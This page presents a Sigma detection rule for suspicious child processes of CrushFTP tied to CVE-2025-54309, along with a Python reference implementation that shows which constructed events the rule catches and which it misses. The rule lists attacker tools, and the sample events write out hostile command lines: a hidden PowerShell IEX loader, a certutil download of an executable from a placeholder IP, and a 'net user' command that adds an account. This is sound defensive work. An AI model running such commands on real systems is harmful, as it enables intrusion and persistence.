Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)

Detects suspicious child processes spawned by the CrushFTP service process (crushftp.exe). Such a child process could indicate exploitation of an RCE vulnerability such as CVE-2025-54309.

Sigma rule

title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
id: 0fdc7c7f-c690-4217-9ae3-31f5156eed72
status: experimental
description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of an RCE vulnerability such as CVE-2025-54309.
references:
    - https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/
    - https://pwn.guide/free/web/crushftp
    - https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/
author: Nisarg Suthar
date: 2025-08-01
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
    - attack.t1068
    - attack.t1190
    - cve.2025-54309
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\crushftp.exe'
    selection_child_powershell:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
        CommandLine|contains|all:
            - 'IEX'
            - 'enc'
            - 'Hidden'
            - 'bypass'
    selection_child_cmd:
        Image|endswith: '\cmd.exe'
        CommandLine|contains:
            - '/c powershell'
            - 'whoami'
            - 'net.exe'
            - 'net1.exe'
    selection_child_others:
        Image|endswith:
            - '\bitsadmin.exe'
            - '\certutil.exe'
            - '\mshta.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    condition: selection_parent and 1 of selection_child_*
falsepositives:
    - Legitimate administrative command execution
level: high
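To see exactly what the rule above does and does not catch, the following is an added Python reference implementation of its matching logic, run over a handful of constructed process-creation events. It is not part of the rule, the Sigma project, or any backend; the events, paths and command lines are invented for illustration. Two behaviours worth noticing: Sigma string modifiers (`endswith`, `contains`) are case-insensitive by default, so both sides are lower-cased; and `selection_child_powershell` uses `contains|all`, so a loader that passes only `-EncodedCommand` (with `IEX` hidden inside the Base64 payload) does not satisfy it. Likewise the `cmd.exe` selection keys on the literal strings `net.exe` / `net1.exe`, which a plain `cmd.exe /c net user ...` command line does not contain.

```python
"""Added reference implementation of the Sigma rule's detection block.

Not the rule's own code and not a Sigma backend; it reproduces the
condition `selection_parent and 1 of selection_child_*` over a small
event model so the edges of the rule can be exercised offline.
All sample events below are constructed, not captured telemetry.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """The three fields the rule inspects (Sysmon EID 1 / 4688 equivalents)."""
    parent_image: str
    image: str
    command_line: str


# Sigma string matching is case-insensitive unless the `cased` modifier
# is used, so every comparison lower-cases both the field and the pattern.
def _endswith_any(value: str, suffixes) -> bool:
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_all(value: str, needles) -> bool:
    v = value.lower()
    return all(n.lower() in v for n in needles)


def _contains_any(value: str, needles) -> bool:
    v = value.lower()
    return any(n.lower() in v for n in needles)


# Patterns copied from the rule's detection block.
PARENT_IMAGES = (r'\crushftp.exe',)
PS_IMAGES = (r'\powershell.exe', r'\powershell_ise.exe', r'\pwsh.exe')
PS_MARKERS_ALL = ('IEX', 'enc', 'Hidden', 'bypass')          # contains|all
CMD_IMAGES = (r'\cmd.exe',)
CMD_MARKERS_ANY = ('/c powershell', 'whoami', 'net.exe', 'net1.exe')  # contains
OTHER_IMAGES = (r'\bitsadmin.exe', r'\certutil.exe', r'\mshta.exe',
                r'\cscript.exe', r'\wscript.exe')


def matched_selections(ev: ProcessEvent) -> list:
    """Return the selection_child_* names that fire for this event.

    An empty list means the rule does not fire, either because the
    parent is not crushftp.exe or because no child selection matched.
    """
    if not _endswith_any(ev.parent_image, PARENT_IMAGES):
        return []
    hits = []
    if (_endswith_any(ev.image, PS_IMAGES)
            and _contains_all(ev.command_line, PS_MARKERS_ALL)):
        hits.append('selection_child_powershell')
    if (_endswith_any(ev.image, CMD_IMAGES)
            and _contains_any(ev.command_line, CMD_MARKERS_ANY)):
        hits.append('selection_child_cmd')
    if _endswith_any(ev.image, OTHER_IMAGES):
        hits.append('selection_child_others')
    return hits


def rule_fires(ev: ProcessEvent) -> bool:
    """`selection_parent and 1 of selection_child_*`."""
    return bool(matched_selections(ev))


# Constructed sample events (hypothetical paths, hosts and payloads).
CRUSH = r'C:\CrushFTP10\crushftp.exe'
PS = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
CMD = r'C:\Windows\System32\cmd.exe'
SAMPLE_EVENTS = {
    # All four literals present: IEX, enc (in "Encoding"), Hidden, bypass.
    'ps_iex_b64': ProcessEvent(CRUSH, PS,
        'powershell.exe -w Hidden -ep bypass -c "IEX([Text.Encoding]::UTF8.'
        'GetString([Convert]::FromBase64String(\'d2hvYW1p\')))"'),
    # Encoded loader: no literal IEX on the command line, so contains|all fails.
    'ps_encoded_only': ProcessEvent(CRUSH, PS,
        'powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand dwBoAG8AYQBtAGkA'),
    'cmd_whoami': ProcessEvent(CRUSH, CMD, 'cmd.exe /c whoami /all'),
    # "net user" does not contain the literal "net.exe" the rule looks for.
    'cmd_net_user': ProcessEvent(CRUSH, CMD, 'cmd.exe /c net user svc_x P@ss1 /add'),
    'certutil_download': ProcessEvent(CRUSH, r'C:\Windows\System32\certutil.exe',
        'certutil.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe'),
    # Same child activity, but the parent is not crushftp.exe.
    'other_parent': ProcessEvent(r'C:\Windows\explorer.exe', CMD, 'cmd.exe /c whoami'),
}


def run_samples() -> dict:
    """Evaluate every constructed event; returns {name: [selections hit]}."""
    return {name: matched_selections(ev) for name, ev in SAMPLE_EVENTS.items()}


if __name__ == '__main__':
    for name, hits in run_samples().items():
        print(f'{name:18} fires={bool(hits)!s:5} {hits}')
```

Running it shows the rule firing on `ps_iex_b64`, `cmd_whoami` and `certutil_download` and staying silent on `ps_encoded_only` and `cmd_net_user`, which is the gap to keep in mind when tuning: the `contains|all` PowerShell selection and the `net.exe` literal are deliberately narrow to hold the `high` level and limit false positives from "legitimate administrative command execution", so pair this rule with broader parent/child anomaly detection for crushftp.exe rather than relying on it alone.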
